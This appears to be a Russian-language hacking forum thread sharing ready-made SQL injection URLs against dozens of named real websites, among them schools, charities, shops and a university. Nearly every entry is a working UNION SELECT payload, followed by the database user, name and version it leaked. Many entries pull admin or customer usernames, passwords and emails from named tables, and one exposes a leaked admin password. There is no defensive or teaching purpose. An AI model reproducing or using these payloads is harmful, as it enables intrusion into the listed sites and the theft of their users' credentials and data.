SQL Инъекции

http://dragobarzini.com/query.php?vote=-4+and+1=0+union+select+1,concat(username,char(58),password),3+from+admin

user() : dragobar_votes@localhost

version() : 5.0.89-community-log

database() : dragobar_votes



http://www.tnak.am/sub/opros.php?quest_id=34+and+1=0+union+select+1,2,3

user() : tnakam_hvh13@localhost

version() : 5.0.89-community

database() : tnakam_tnaks

 

http://knockonmydoor.com/wholesale/newsletter.php?id=1+and+1=0+union+select+1,2,3,4,5,6,7,8--

 

Code:

http://www.mondialisations.org/php/public/liste.php?r=558+union+select+concat_ws(0x3a,user(),database(),version()),2--

Username: mondial@localhost
Database: mondial
Version: 4.1.20

Code:

http://www.stpatricks.org.au/printpage.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--

Username: stpats@localhost
Database: stpats
Version: 5.0.32-Debian_7etch5-lo

Title. Есть users.

Code:

http://calendar.templemenorahmiami.org/eventdisplay.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3--

Username: [email protected]
Database: db292889623
Version: 5.0.81-log

Code:

http://swim.wellsreserve.org/stories.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,user(),database(),version()))),6,7,8,9--

Username: [email protected]
Database: anguilla
Version: 4.1.16-standard-log

Code:

http://www.healthaccessproject.org/vpn_output.php?practice=-1+union+select+unhex(hex(concat_ws(0x3a,user(),database(),version()))),2--

Username: [email protected]
Database: healthaccess
Version: 4.1.11-Debian_4sarge8-log

KENT1994, чтобы не терли посты — приводи инъекцию в нормальный вид. После ID дописывай количество колонок. В начале темы написано.

 

Code:

http://cpod.org.au/page.php?id=-144+union+select+1,2,3,4,5,6,7,8+--+

Version: 5.0.45
User: CBAA@localhost
Database: cbaa

 

http://mora.am/products.php?category=3+union+select+1,2,3,4,5,6,concat(user(),version(),database()),8+from+information_schema.tables

user() : tiensam@localhost

version() : 5.0.89-community

database() : tiensam_mora

 

Code:

http://www.huntersearch.com.au/entertainment.php?id=-144+union+select+1,2,convert%28version%28%29+using+latin1%29,4+--+

Version: 5.0.16-max-log
User: w2768@localhost
Database: huntersearch_com_au_huntersearch

 

Code:

http://www.drchaiyot.com/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat%28id,0x3a,username,0x3a,password%29,3,4+from+user

Code:

http://www.mondorecords.com/shop.php?id=276+UNION/**/SELECT/**/1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9,10,11/**/LIMIT/**/1,1--

xsqlinjbegin4.0.27-standard
db124719782
dbo124719782@local

Code:

http://www.orchardcentral.com.sg/shop.php?id=-211+UNION+SELECT+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16--

orchard_usr@localhost
orchardcentral_db
5.0.45

 

китайский PR 5

Code:

http://rjb.bjtu.edu.cn/show.php?id=-1+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9%20--

database: rjbdb
version: 5.0.24a-community-nt
user: root@localhost

 

Code:

http://chelhouse.ru/ipoteka/show_law.php?id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4%20--+

User: 3wuralpress@localhost
Datebase: upi
Version: 5.0.70-log

Code:

http://www.miwatson-electric.ltd.uk/gallery.php?id=1&imgid=-1%20UNION%20SELECT%201,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29%20--+

User: miwatson_www@localhost
Datebase: miwatson_www
Version: 5.0.89-community-log

Code:

http://www.kromestudios.com/games/overview.php?id=-1%20UNION%20SELECT%201,2,3,4,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20%20--+

User: root@localhost
Datebase: logkromeweb2
Version: 5.0.45

 

http://www.aed.am/program.php?prog=136+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

user() : root@localhost

version() : 5.0.51a-24+lenny3

database() : aed_website

--------------------------------------

есть таблица users

p.s. Так и не нашёл админку...

 

сайт ОПУС ДЕИ личная прелатура ватикана,та самая о которой писал Дэн Браун в "Коде Да Винчи"
http://www.opusdei.us/ssec.php?a=1932%27+and+substring%28@@version,1,1%2 9=5+--+

 

Code:

http://www.fibel-gastro.de/saarland/archiv.php?p=gallery&id=-2+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11--

User: [email protected]
Database: db282976108
Version: 5.0.81-log

Code:

http://zhigach.com/blog_show.php?id=1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6--

User: [email protected]
Database: gb_x_zhigach
Version: 5.0.70-log

Code:

http://store-apple.ru/goods.htm?parent_id=-56+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15--

User: itbala_alex@localhost
Database: itbala_iphonezakaz
Version: 5.0.89-community

Code:

http://www.toshiba-klima.at/produkt/artikel.php?id=420+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19--&lang=2

User: root@localhost
Database: aircond
Version: 5.0.45
PR4

 

border.se PR-5

Code:

http://www.border.se/Search.php?searchtext=IVELAND KARI&select=artist+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14+--+

Code:

5.1.38-community:bordermusic@localhost:bordermusic

svedab.se PR-4

Code:

http://www.svedab.se/sida.php?sid=2&usid=-8%27+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17+--+

Code:

5.0.67:[email protected]:u5943590_1

 

Code:

http://www.fotomundo.com/nota.php?id=1147+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15--

User: fotomundo.com@localhost
Database: fotomundo_com
Version: 5.0.77
PR5

 

machinz.co.uk

вся инфа в исходном коде страницы

Code:

http://www.machinz.co.uk/Productview.php?product=-2+and+1=2+union+select+1,concat(Username,0x20,Password,0x20,Email)+from+LoginUsers--

jagz.co.uk

Code:

http://www.jagz.co.uk/menu.php?CategoryID=-9+union+select+1,2,concat(AdminName,0x20,AdminPwd),4,5,6,7,8,9+from+Admin--

biblios.pijnenburg.it

Code:

http://biblios.pijnenburg.it/title.php?param=-1547+union+select+1,2,3,4,concat(username,0x20,password),6,7,8,9,10,11+from+tblUser--

www.vivliokritiki.gr

Code:

http://www.vivliokritiki.gr/title.php?id=-6+union+select+1,concat(email,0x20,password),3,4,5,6,7,8,9,10,11,12+from+users--

jetproducts.co.uk
в исходном коде

Code:

http://www.jetproducts.co.uk/details.php?prod_id=-159+union+select+1,concat(username,0x20,password,0x20,email),3,4+from+zebra_admin--

istitutocam.com

Code:

http://www.istitutocam.com/pagina-istituto-cam.php?id=-3+union+select+1,2,concat(username,0x20,password,0x20,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+clienti--

www.liveview.cz

Code:

http://www.liveview.cz/cam.php?id=-31+union+select+1,concat(login,0x20,pwd)+from+lv_users--

Code:

admin;qweasd

salesbearing.com
вывод в тайтле

Code:

http://www.salesbearing.com/products/product.php?id=-31+union+select+1,concat(username,0x20,pwd),3,4+from+admin--

moretonisland.com.au

Code:

http://www.moretonisland.com.au/product.php?id=-67753+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+customers--

edra.com

Code:

http://www.edra.com/product.php?id=-42+union+select+1,2,3,4,5,concat(user(),0x20,database(),0x20,version()),7,8,9,10,11,12,13,14,15,16,17,18--

 

Code:

http://www.kras-ru.1gb.ru/action.php?action=plugin&name=gallery&type=album&id=-5+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--

User: [email protected]
Database: 1gb_kras
Version: 5.0.51a-community-nt-log

Code:

http://expozice.sternberk.cz/ClankyPodrobnosti.php?id=87+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--&typ=aktualne

User: expozice_casu@localhost
Database: expozice_casu
Version: 4.0.18-max-debug

Code:

http://www.esend.su/index.php?mode=user_message_details&id=106823+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--&page=&rows=&owner=&for_time=31&cost1=&cost2=&object=&region=&thing=&number=&phone_avail=&mebel_avail=&refrigerator_avail=&tv_avail=&street=

User: send@localhost
Database: esend
Version: 5.0.32-Debian_7etch12-log

Code:

http://www.che-esche.com/fullafisha.php?id=53+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--

User: cheesche_cheewe2@localhost
Database: cheesche_cheesche
Version: 5.0.77-log

 

на этом сайте уже было, но в другом месте.

 

http://www.nutricia.pl/kartki_galeria.php?A=SCHOW_ID&pid=-4671+union+select+1,concat(loginname,char(58),password)+from+cmslist_admin--

user() : [email protected]
version() : 5.0.84
database() : nutricia

nutrica.pl/cms
nutrica.pl/admin

admin : phplist (в админу не входит).... ????

 

Code:

http://www.seacsub.com/product.php?ID=679+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,user(),database(),version()),29,30,31,32,33,34,35--

User: seacsub07@localhost
Database: seacsub_com
Version: 5.0.45
PR4

 

Code:

https://www.greatcanadianholidays.com/greatcanadianholidays/myweb.php?hls=10007&id=30696+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,unhex(hex(concat_ws(0x3a,user(),database(),version()))),47,48,49,50,51--

User: gchc_plujo@localhost
Database: MYwebPHP-great
Version: 4.1.10a

Code:

http://etweb.gazettenet.com/web/gateway.php?query=VenueEvents&site=default&tpl=cm_VenueSchedule&ID=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551--

551 колонка

User: [email protected]
Database: etweb
Version: 4.1.22-log